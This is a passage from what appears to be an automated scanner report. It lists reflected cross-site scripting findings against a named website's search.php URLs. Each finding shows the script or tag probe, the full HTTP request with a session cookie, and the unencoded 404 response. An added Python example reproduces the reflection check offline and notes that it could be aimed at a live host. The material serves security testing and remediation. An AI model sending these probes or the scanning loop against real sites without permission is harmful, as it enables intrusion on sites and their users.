<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos2c5c5<script>alert(1)</script>268b550fcb8/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4043. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 91ece<script>alert(1)</script>81895c97131 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images91ece<script>alert(1)</script>81895c97131/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images91ece<script>alert(1)</script>81895c97131/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4044. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a445f<script>alert(1)</script>9167522d4d3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/reviewa445f<script>alert(1)</script>9167522d4d3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/reviewa445f<script>alert(1)</script>9167522d4d3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4045. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 994b5<script>alert(1)</script>bbbe3551e3c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php994b5<script>alert(1)</script>bbbe3551e3c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php994b5<script>alert(1)</script>bbbe3551e3c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4046. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3c236<a>4ae58f4668d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search3c236<a>4ae58f4668d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search3c236<a>4ae58f4668d&opt=2 was not found on this server.</p>
...[SNIP]...

2.4047. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f9297<a>588d8c2b285 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...f9297<a>588d8c2b285&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...f9297<a>588d8c2b285&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4048. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67213<script>alert(1)</script>f7cb61dc267 was submitted as the name of an added request parameter and was echoed unmodified in the response.

This proof of concept shows that arbitrary JavaScript can be injected into the application's response. Note the sink: the request never reaches search.php but is answered by the site's custom 404 page (the X-Powered-By: PHP/5.2.14 header on a 404 response indicates the error document is itself a PHP script), which writes the raw request URI into the line "The requested URL ... was not found on this server." without HTML encoding. The separate findings for each path segment and parameter of this URL, and for the other search.php URLs in this section, all reflect through that one sink, and HTML-encoding the URI in the error page (htmlspecialchars() in PHP) closes every one of them.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&67213<script>alert(1)</script>f7cb61dc267=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&67213<script>alert(1)</script>f7cb61dc267=1 was not found on this server.</p>
...[SNIP]...

2.4049. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 83baa<a>d949e661b41 was submitted in the opt parameter and was echoed unmodified in the response.

This shows that new HTML tags can be injected into the returned document. The scanner could not confirm a payload that executes arbitrary JavaScript in this parameter, even though the same <script>alert(1)</script> probe is reflected unmodified when placed in a parameter name (2.4048) or in a path segment (for example 2.4050 to 2.4055 against the sibling images/search.php URL), and the reflecting sink, the 404 page, is the same. Test the parameter manually. A filter that inspects parameter values but not parameter names or path segments would explain the difference, but that is an inference from the scanner's results, not something this report establishes.

Request

GET /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=283baa<a>d949e661b41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=283baa<a>d949e661b41 was not found on this server.</p>
...[SNIP]...
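The following Python script is an added worked example, not part of the scanner output and not the site's code. It reconstructs offline what findings 2.4048 and 2.4049, and the rest of this group, have in common: a 404 page that writes the raw request URI into an HTML text context, the canary-wrapped probes placed in each path segment ("REST URL parameter n"), in a new parameter name and in existing parameter values, and the Certain/Firm grading, with the hardened page beside the vulnerable one. The 404 renderer is a constructed imitation of the response body shown above; the URI is the one from 2.4048. Unlike the real target, the imitation applies no filtering to parameter values, so it grades those Certain as well.

```python
"""Added example: reproduce offline the reflection check behind these findings."""
import html
import secrets
from urllib.parse import urlsplit, urlunsplit


def render_404_vulnerable(request_uri):
    # Constructed stand-in for the 404 page seen in the responses above
    # (not the site's code): the raw request URI lands in an HTML text
    # context with no encoding.
    return ("<title>Error 404 - Page Not Found</title>\n"
            f"<p>The requested URL {request_uri} was not found on this server.</p>")


def render_404_hardened(request_uri):
    # The one change that closes every finding in this group: HTML-encode
    # the URI before writing it (htmlspecialchars() in the PHP original).
    return ("<title>Error 404 - Page Not Found</title>\n"
            f"<p>The requested URL {html.escape(request_uri, quote=True)} "
            "was not found on this server.</p>")


def canary(probe):
    """Bracket a probe with random hex so its reflection can be located
    unambiguously; this is the shape of the report's payloads, e.g.
    67213<script>alert(1)</script>f7cb61dc267."""
    return secrets.token_hex(3)[:5] + probe + secrets.token_hex(6)[:11]


def inject_path_segment(uri, n, payload):
    """Append payload to the n-th path segment ("REST URL parameter n")."""
    parts = urlsplit(uri)
    segs = parts.path.split("/")          # segs[0] == "" for the leading "/"
    segs[n] += payload
    return urlunsplit(parts._replace(path="/".join(segs)))


def inject_param_name(uri, payload):
    """Add a query parameter whose name is the payload
    ("name of an arbitrarily supplied request parameter")."""
    parts = urlsplit(uri)
    sep = "&" if parts.query else ""
    return urlunsplit(parts._replace(query=f"{parts.query}{sep}{payload}=1"))


def inject_param_value(uri, name, payload):
    """Append payload to the value of an existing query parameter, sent raw
    (no percent-encoding), as the scanner did."""
    parts = urlsplit(uri)
    pairs = [p + payload if p.split("=", 1)[0] == name else p
             for p in parts.query.split("&")]
    return urlunsplit(parts._replace(query="&".join(pairs)))


def reflection(body, payload):
    """How the payload came back: 'unmodified', 'encoded' or 'absent'."""
    if payload in body:
        return "unmodified"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "absent"


def confidence(render, make_uri):
    """The report's grading: 'Certain' when a <script> probe is reflected
    unmodified, 'Firm' when only a bare <a> tag is, None when neither."""
    for probe, grade in (("<script>alert(1)</script>", "Certain"), ("<a>", "Firm")):
        payload = canary(probe)
        if reflection(render(make_uri(payload)), payload) == "unmodified":
            return grade
    return None


def assess(render, uri):
    """Grade every injection point the report enumerates for one URL."""
    parts = urlsplit(uri)
    results = {}
    for n in range(1, len(parts.path.split("/"))):
        results[f"REST URL parameter {n}"] = confidence(
            render, lambda p, n=n: inject_path_segment(uri, n, p))
    results["name of an arbitrarily supplied request parameter"] = confidence(
        render, lambda p: inject_param_name(uri, p))
    for name in (pair.split("=", 1)[0] for pair in parts.query.split("&") if pair):
        results[f"{name} parameter"] = confidence(
            render, lambda p, name=name: inject_param_value(uri, name, p))
    return results


# The URL from finding 2.4048, without the payload.
REPORT_URI = ("/resources-information/ebooks/themes/kosmos/images/review/search.php"
              "?keyword=search...&Submit3=Search&opt=2")

if __name__ == "__main__":
    for label, render in (("vulnerable", render_404_vulnerable),
                          ("hardened", render_404_hardened)):
        print(label)
        for point, grade in assess(render, REPORT_URI).items():
            print(f"  {point}: {grade}")
```

Against the vulnerable renderer every one of the eleven injection points (seven path segments, one parameter name, three parameter values) grades Certain; against the hardened renderer none reflects, because the probe comes back as &lt;script&gt; inside the encoded URI. The same assess() loop can be pointed at a live host by replacing the render argument with a function that sends the URI and returns the response body.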

2.4050. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2356a<script>alert(1)</script>bc955b5e20e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information2356a<script>alert(1)</script>bc955b5e20e/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information2356a<script>alert(1)</script>bc955b5e20e/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4051. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ddc7d<script>alert(1)</script>7f0eb0f124b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksddc7d<script>alert(1)</script>7f0eb0f124b/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksddc7d<script>alert(1)</script>7f0eb0f124b/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4052. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d356a<script>alert(1)</script>816c02229a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesd356a<script>alert(1)</script>816c02229a5/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesd356a<script>alert(1)</script>816c02229a5/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4053. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b713b<script>alert(1)</script>6b1da1e080 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmosb713b<script>alert(1)</script>6b1da1e080/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmosb713b<script>alert(1)</script>6b1da1e080/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4054. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bbd0d<script>alert(1)</script>c2ad9d893d9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/imagesbbd0d<script>alert(1)</script>c2ad9d893d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/imagesbbd0d<script>alert(1)</script>c2ad9d893d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4055. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f1b50<script>alert(1)</script>43b01012cc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.phpf1b50<script>alert(1)</script>43b01012cc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.phpf1b50<script>alert(1)</script>43b01012cc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4056. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f9aad<a>fb2059607b0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This shows that new HTML tags can be injected into the returned document. The scanner could not confirm a payload that executes arbitrary JavaScript in this parameter; examine it manually for input validation or other filtering that may be blocking the script probe.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchf9aad<a>fb2059607b0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchf9aad<a>fb2059607b0&opt=2 was not found on this server.</p>
...[SNIP]...

2.4057. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 14805<a>fbc4f161a0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This shows that new HTML tags can be injected into the returned document. The scanner could not confirm a payload that executes arbitrary JavaScript in this parameter; examine it manually for input validation or other filtering that may be blocking the script probe.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...14805<a>fbc4f161a0b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

